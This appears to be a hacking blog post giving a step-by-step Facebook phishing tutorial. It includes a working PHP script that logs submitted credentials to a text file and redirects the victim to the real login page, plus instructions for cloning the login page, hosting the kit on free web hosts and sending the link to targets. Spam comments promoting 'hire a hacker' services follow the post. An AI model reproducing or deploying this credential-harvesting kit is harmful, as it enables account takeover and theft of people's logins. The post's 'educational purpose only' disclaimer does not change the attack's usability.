What is Phishing? How Hackers Hack Through Phishing Attack

Phishing is a term used to describe a malicious individual or group of individuals who scam users.Phishing is a type of social engineering attack often used to steal user data, including login credentials and credit card numbers.Phishing is the process of directing users to enter details into a fake website that look and feel like the legitimate one. Basically all you are doing is getting your target to login to your fake login page and you will be sent their  email and password.


1. Creating Phishing.php file

Even if you don't have any knowledge of php file simply copy the following script and save it as phishing.php .


header("Location: https://www.facebook.com/login.php");

$handle = fopen("passwords.txt", "a");

foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");}

fwrite($handle, "\r\n");


2. Creating index.html page 

1. Open Facebook login page then, Right click>View page source and paste it in notepad and save it a

2. Open that index.html file with a Notepad and search (By pressing Ctrl+F) for : action in it and replace the highlighted part (as in the following screenshot) with phishing.php .

3. search (By pressing Ctrl+F) for : method in it and replace the highlighted part (post) with get .

4. save index.html

3. Now create a completely blank text file with name passwords.txt.

Now you have all the following three files with you :

1. phishing.php
2. index.html
3. passwords.txt

4. Now you need to make a website means need free hosting.

Register on byethost.com or 2freehosting.comor use any free hosting service you like.

Log into your account Cpanel.

Go to File Manager under Files and log into it.

5. Now Click on the Public_html.

6 .Click on the Upload button and upload 3 files named phishing.php, index.html and passwords.txt 
(before uploading files you need to delete all the files inside  the Public_html folder)

7. After successfully uploaded 3 files click on index.html file, then your fake phishing page will open up.


Now sent your fake login page's URL to someone via email or chatting  , when someone type their facebook email and password in your fake login page it will store to your passwords.txt file

Through this attacker can hack any website account.

NOTE: This is just for educational purpose only.


  1. After a long time, I read a very beautiful and very important article that I enjoyed reading. I have found that this article has many important points, I sincerely thank the admin of this website for sharing it. Best hire a hacker for social media service provider.

  2. It is truly a well-researched content and excellent wording. I got so engaged in this material that I couldn’t wait to read. I am impressed with your work and skill. Thanks. Hire a hacker

  3. Hey what a brilliant post I have come across and believe me I have been searching out for this similar kind of post for past a week and hardly came across this. Thank you very much and will look for more postings from you Best genuine hackers for hire service provider.


Post a Comment

Popular posts from this blog

Email Spoofing for Beginners

XSS like a Pro

DoS on WAF Protected Sites by Abusing Cookie